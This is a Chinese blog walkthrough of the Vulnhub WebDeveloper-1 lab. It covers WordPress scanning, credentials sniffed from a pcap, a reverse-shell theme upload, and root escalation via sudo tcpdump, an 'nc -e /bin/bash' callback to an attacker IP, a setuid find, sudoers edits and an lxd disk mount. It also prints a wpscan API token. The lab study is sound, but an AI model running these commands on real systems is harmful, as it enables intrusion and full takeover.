【甄选靶场】Vulnhub百个项目渗透——项目二十九:WebDeveloper-1(cms利用,二进制文件提权,挂载提权)

最新推荐文章于 2023-12-04 00:56:33 发布
最新推荐文章于 2023-12-04 00:56:33 发布
阅读量1.1k 收藏
点赞数
分类专栏: vulnhub百个项目渗透 文章标签: 安全 网络安全 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127129190
版权

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目二十九:WebDeveloper-1(cms利用,二进制文件提权,挂载提权)

靶场地址

🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年10月2日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

巅峰之路

前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。

一、梳理流程

  1. 端口发现(看看使用了哪些端口,开启了什么服务,寻找突破点)
  2. 信息收集(利用遍历,关键词搜索等方式对敏感文件,插件尝试访问,寻求突破并获取shell)
  3. 二次收集(基于已得到的服务或者主机再次信息收集)
  4. 内网提权(尝试利用内核,各种版本漏洞等方式来提升权限)
  5. 毁尸灭迹(清除日志等文件,但是靶场就没必要了,拿旗就走)

二、信息收集

在这里插入图片描述

只开放了80和22

在这里插入图片描述

扫描爆破

用wpscan或者dirb都行,下面这个是wpscan的扫描结果

──(root💀kali)-[~/Desktop]
└─# wpscan --url http://192.168.247.160/ -eu --api-token uD347buY2u0Vnk6agGuWxOPWswtzel5G0X5nwF2CDBg
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.247.160/ [192.168.247.160]
[+] Started: Fri Sep 30 09:17:08 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.247.160/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.247.160/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.247.160/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.247.160/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.247.160/index.php/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>
 |  - http://192.168.247.160/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>
 |
 | [!] 36 vulnerabilities identified:
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/e3ef8976-11cb-4854-837f-786f43cbdf44
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/999dba5a-82fb-4717-89c3-6ed723cc7e45
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
 |
 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/046ff6a0-90b2-4251-98fc-b7fba93f8334
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/3182002e-d831-4412-a27d-a5e39bb44314
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/7f7a0795-4dd7-417d-804e-54f12595d1e4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
 |
 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/65f1aec4-6d28-4396-88d7-66702b21c7a2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/d741f5ae-52ca-417d-a2ca-acdfb7ca5808
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
 |
 | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
 |     Fixed in: 4.9.9
 |     References:
 |      - https://wpscan.com/vulnerability/1a693e57-f99c-4df6-93dd-0cdc92fd0526
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8943
 |      - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
 |      - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
 |
 | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
 |     Fixed in: 4.9.10
 |     References:
 |      - https://wpscan.com/vulnerability/d150f43f-6030-4191-98b8-20ae05585936
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
 |      - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
 |      - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
 |      - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/
 |
 | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
 |     Fixed in: 4.9.11
 |     References:
 |      - https://wpscan.com/vulnerability/4494a903-5a73-4cad-8c14-1e7b4da2be61
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
 |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
 |      - https://hackerone.com/reports/339483
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
 |     Fixed in: 4.9.12
 |     References:
 |      - https://wpscan.com/vulnerability/d39a7b84-28b9-4916-a2fc-6192ceb6fa56
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
 |     Fixed in: 4.9.12
 |     References:
 |      - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
 |     Fixed in: 4.9.12
 |     References:
 |      - https://wpscan.com/vulnerability/d005b1f8-749d-438a-8818-21fba45c6465
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
 |     Fixed in: 4.9.12
 |     References:
 |      - https://wpscan.com/vulnerability/7804d8ed-457a-407e-83a7-345d3bbe07b2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation 
 |     Fixed in: 4.9.12
 |     References:
 |      - https://wpscan.com/vulnerability/26a26de2-d598-405d-b00c-61f71cfacff6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
 |     Fixed in: 4.9.12
 |     References:
 |      - https://wpscan.com/vulnerability/715c00e3-5302-44ad-b914-131c162c3f71
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
 |      - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API
 |     Fixed in: 4.9.13
 |     References:
 |      - https://wpscan.com/vulnerability/4a6de154-5fbd-4c80-acd3-8902ee431bd8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links
 |     Fixed in: 4.9.13
 |     References:
 |      - https://wpscan.com/vulnerability/23553517-34e3-40a9-a406-f3ffbe9dd265
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20042
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://hackerone.com/reports/509930
 |      - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content
 |     Fixed in: 4.9.13
 |     References:
 |      - https://wpscan.com/vulnerability/be794159-4486-4ae1-a5cc-5c190e5ddf5f
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
 |
 | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
 |     Fixed in: 4.9.13
 |     References:
 |      - https://wpscan.com/vulnerability/8fac612b-95d2-477a-a7d6-e5ec0bb9ca52
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
 |
 | [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated
 |     Fixed in: 4.9.14
 |     References:
 |      - https://wpscan.com/vulnerability/7db191c0-d112-4f08-a419-a1cd81928c4e
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47634/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw
 |
 | [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts
 |     Fixed in: 4.9.14
 |     References:
 |      - https://wpscan.com/vulnerability/d1e1ba25-98c9-4ae7-8027-9632fb825a56
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47635/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer
 |     Fixed in: 4.9.14
 |     References:
 |      - https://wpscan.com/vulnerability/4eee26bd-a27e-4509-a3a5-8019dd48e429
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47633/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c
 |
 | [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache
 |     Fixed in: 4.9.14
 |     References:
 |      - https://wpscan.com/vulnerability/e721d8b9-a38f-44ac-8520-b4a9ed6a5157
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47637/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads
 |     Fixed in: 4.9.14
 |     References:
 |      - https://wpscan.com/vulnerability/55438b63-5fc9-4812-afc4-2f1eff800d5f
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47638/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2
 |      - https://hackerone.com/reports/179695
 |
 | [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure
 |     Fixed in: 4.9.17
 |     References:
 |      - https://wpscan.com/vulnerability/6a3ec618-c79e-4b9c-9020-86b157458ac5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29450
 |      - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/
 |      - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pmmh-2f36-wvhq
 |      - https://core.trac.wordpress.org/changeset/50717/
 |      - https://www.youtube.com/watch?v=J2GXmxAdNWs
 |
 | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
 |     Fixed in: 4.9.18
 |     References:
 |      - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296
 |      - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62
 |      - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/
 |      - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9
 |      - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/
 |      - https://www.youtube.com/watch?v=HaW15aMzBUM
 |
 | [!] Title: WordPress < 5.8 - Plugin Confusion
 |     Fixed in: 5.8
 |     References:
 |      - https://wpscan.com/vulnerability/95e01006-84e4-4e95-b5d7-68ea7b5aa1a8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44223
 |      - https://vavkamil.cz/2021/11/25/wordpress-plugin-confusion-update-can-get-you-pwned/
 |
 | [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
 |     Fixed in: 4.9.19
 |     References:
 |      - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
 |      - https://hackerone.com/reports/1378209
 |
 | [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs
 |     Fixed in: 4.9.19
 |     References:
 |      - https://wpscan.com/vulnerability/dc6f04c2-7bf2-4a07-92b5-dd197e4d94c8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21662
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-699q-3hj9-889w
 |      - https://hackerone.com/reports/425342
 |      - https://blog.sonarsource.com/wordpress-stored-xss-vulnerability
 |
 | [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
 |     Fixed in: 4.9.19
 |     References:
 |      - https://wpscan.com/vulnerability/24462ac4-7959-4575-97aa-a6dcceeae722
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21664
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jp3p-gw8h-6x86
 |
 | [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites
 |     Fixed in: 4.9.19
 |     References:
 |      - https://wpscan.com/vulnerability/008c21ab-3d7e-4d97-b6c3-db9d83f390a7
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21663
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jmmq-m8p8-332h
 |      - https://hackerone.com/reports/541469
 |
 | [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery
 |     Fixed in: 4.9.20
 |     References:
 |      - https://wpscan.com/vulnerability/1ac912c1-5e29-41ac-8f76-a062de254c09
 |      - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
 |
 | [!] Title: WP < 6.0.2 - Reflected Cross-Site Scripting
 |     Fixed in: 4.9.21
 |     References:
 |      - https://wpscan.com/vulnerability/622893b0-c2c4-4ee7-9fa1-4cecef6e36be
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
 |
 | [!] Title: WP < 6.0.2 - Authenticated Stored Cross-Site Scripting
 |     Fixed in: 4.9.21
 |     References:
 |      - https://wpscan.com/vulnerability/3b1573d4-06b4-442b-bad5-872753118ee0
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
 |
 | [!] Title: WP < 6.0.2 - SQLi via Link API
 |     Fixed in: 4.9.21
 |     References:
 |      - https://wpscan.com/vulnerability/601b0bf9-fed2-4675-aec7-fed3156a022f
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/

[+] WordPress theme in use: twentyseventeen
 | Location: http://192.168.247.160/wp-content/themes/twentyseventeen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://192.168.247.160/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: http://192.168.247.160/wp-content/themes/twentyseventeen/style.css?ver=4.9.8
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.247.160/wp-content/themes/twentyseventeen/style.css?ver=4.9.8, Match: 'Version: 1.7'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] webdeveloper
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.247.160/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 73

[+] Finished: Fri Sep 30 09:17:15 2022
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 15.988 KB
[+] Data Received: 12.334 MB
[+] Memory used: 155.754 MB
[+] Elapsed time: 00:00:07

在这里插入图片描述

看到这个文件夹,辨认的方法就是从来没见过

在这里插入图片描述

打开是一个流量文件,我们一般找流量文件就是找POST,关键字,或者只跟踪TCO流,因为其他有很多握手啊那样没啥用的包,我们先做一个筛选

http.request.method == “POST”
发现有两个POST包,里面可能就有账号密码,因为账号密码基本都是POST,比较安全

在这里插入图片描述

上图是右键跟踪

在这里插入图片描述

果然,就在这里获取到了,密码是url编码,解个码

webdeveloper
Te5eQg&4sBS!Yr$)wf%(DcAd

然后直接登录,在
Appearance->Add New->Upload Theme->文件上传
用KALI自带的php-revrser脚本即可,用别的也行,随你
因为之前目录爆破出来了uploads的目录,不信去wpscan扫描结果里看
在这里插入图片描述本地开个端口接着,然后点一下1.php即可

提权

信息收集

版本信息:不可利用

用户信息:LXD权限    108(lxd)   ---用户是lxd组成员

泄露信息:(这一步比较难,因为容易漏,总结一下,看到config,那就要看,要有这种敏感性)
/var/www/html/wp-config.php
define('DB_NAME', 'wordpress');
define('DB_USER', 'webdeveloper');
define('DB_PASSWORD', 'MasterOfTheUniverse');
define('DB_HOST', 'localhost');

其他信息,暂且没有

sudo信息:不能sudo提权

数据库信息:没有特殊权限,不能UDF提权

les枚举信息:失败

接下来用枚举出的账号密码登录ssh,转进一下

ssh webdeveloper@192.168.253.175
MasterOfTheUniverse

在这里插入图片描述

sudo all 提权

sudo -l
发现如上图,有tcpdump

这个网址之前给过,照着弄就完事了
原理就是利用这种系统自带的二进制可执行文件中的特殊模块就可以拿到shell,(前提是他们有sudo权限)
https://gtfobins.github.io/gtfobins/tcpdump/
在这里插入图片描述

echo “nc -e /bin/bash 192.168.247.129 9988” > rong
chmod +x rong
sudo tcpdump -ln -i eth1 -w /dev/null -W 1 -G 1 -z /tmp/rong -Z root
就注意一点,那个eth1是网卡信息,更改成靶机确实存在的网卡

-i eth0 从指定网卡捕获数据包
-w /dev/null 将捕获到的数据包输出到空设备(不输出数据包结果)
-W [num] 指定抓包数量
-G [rotate_seconds] 每rotate_seconds秒一次的频率执行-w指定的转储
-z [command] 运行指定的命令
-Z [user] 指定用户执行命令

发现无法获得反弹shell,因为该环境的nc -e不允许,版本太低了nc!
在这里插入图片描述

find提权

一般到这种时候我们就要想办法替换nc命令,在存在其他命令时候,我们也可以尝试使用python啊,perl写入到文件,去尝试,不过我们也可以使用更普遍的find提权方式,其本质意义原理就是利用tcpdumo来赋予find最高权限,然后再利用find来提权,达到转进的效果。

查看是否存在find命令setuid执行权限:
find / -perm -4000 2>/dev/null | grep find

echo "chmod u+s /usr/bin/find"> shell.sh
chmod +x shell.sh
sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root

创建完成确认find命令是否成功被赋予setuid权限:
find / -perm -4000 2>/dev/null | grep find
执行find命令开始提权
find /tmp -exec sh -i \;   ---发现没有获得root权限
find . -exec /bin/sh -p\;  --- -p执行即可

在这里插入图片描述

所有权提权

在这里插入图片描述

利用tcpdump把这个用户ALL权限的sudo这个脚本赋予root权限

echo ‘echo “%webdeveloper ALL=(ALL:ALL) ALL” >> /etc/sudoers’ > test.sh
chmod +x test.sh
sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/test.sh -Z root
sudo -l —这时候就拥有所有权了

sudo su —获得root权限!
在这里插入图片描述

挂载提权

滥用该lxd组来重新挂载文件系统并更改root拥有的文件
参考:
https://reboare.github.io/lxd/lxd-escape.html
利用的是lxc会从云端拉取一个镜像作为挂载,我们可以将他挂载到重要目录上

创建
lxd init   ----   一直回车

创建了一个lxc容器:
lxc init ubuntu:16.04 test -c security.privileged=true

分配了安全权限,并将整个磁盘挂载到/mnt/root:
lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
这时候会下载几分钟!
lxc start test
lxc exec test bash
这时候挂载的test 乌班图容器就挂载好了,执行命令:
执行的还是所有权命令:

echo "%webdeveloper ALL=(ALL:ALL) ALL" >> /mnt/root/etc/sudoers
exit 
sudo su
人间体佐菲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【FPGA】Verilog:计数器 | 异步计数器 | 同步计数器 | 2位二进制计数器的实现 | 4位十进制计数器的实现
有道无术, 术尚可求。有术无道, 止于术。
11-11 9297
实现2位二进制计数器和4位十进制计数器。
100天精通鸿蒙从入门到跳槽——第1天:从安装编译器 DevEco Studio 开始
最新发布
猫头虎:授渔优于赠鱼,兴趣引领智慧,探索之乐尤显珍贵。商务合作:Libin9iOak,共赴知识与乐趣的探索之旅!
01-16 7万+
欢迎来到“100天精通HarmonyOS”专栏,这里是为Web和安卓开发者量身定制的学习天堂!今天,我们将从安装华为的集成开发环境——开始,打开探索HarmonyOS世界的大门。本文将详细指导你如何迅速搭建起你的HarmonyOS开发环境,确保你能够顺利跨入华为生态系统的编程旅程。无论是为了职业发展,还是对新技术的渴望,这一系列教程都将成为你快速成长的助力。经过本文的学习,你应该已经成功安装并配置了编译器,迈出了成为HarmonyOS应用开发者的第一步。
vulnhub靶机AI-Web2渗透笔记
liver100day的博客
07-24 2114
文章目录环境准备渗透过程1.信息收集1.1 主机发现1.2 端口扫描1.3 访问web网页(80端口)2.漏洞利用1 利用目录穿越(Directory Traversal)漏洞读取/etc/passwd2.利用暴力破解获取密码4 获得目标shell提权 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-2,357/ 渗透过程 1.信息收集 1..
vulnhub靶场WEB DEVELOPER: 1
kukudeshuo的博客
12-21 950
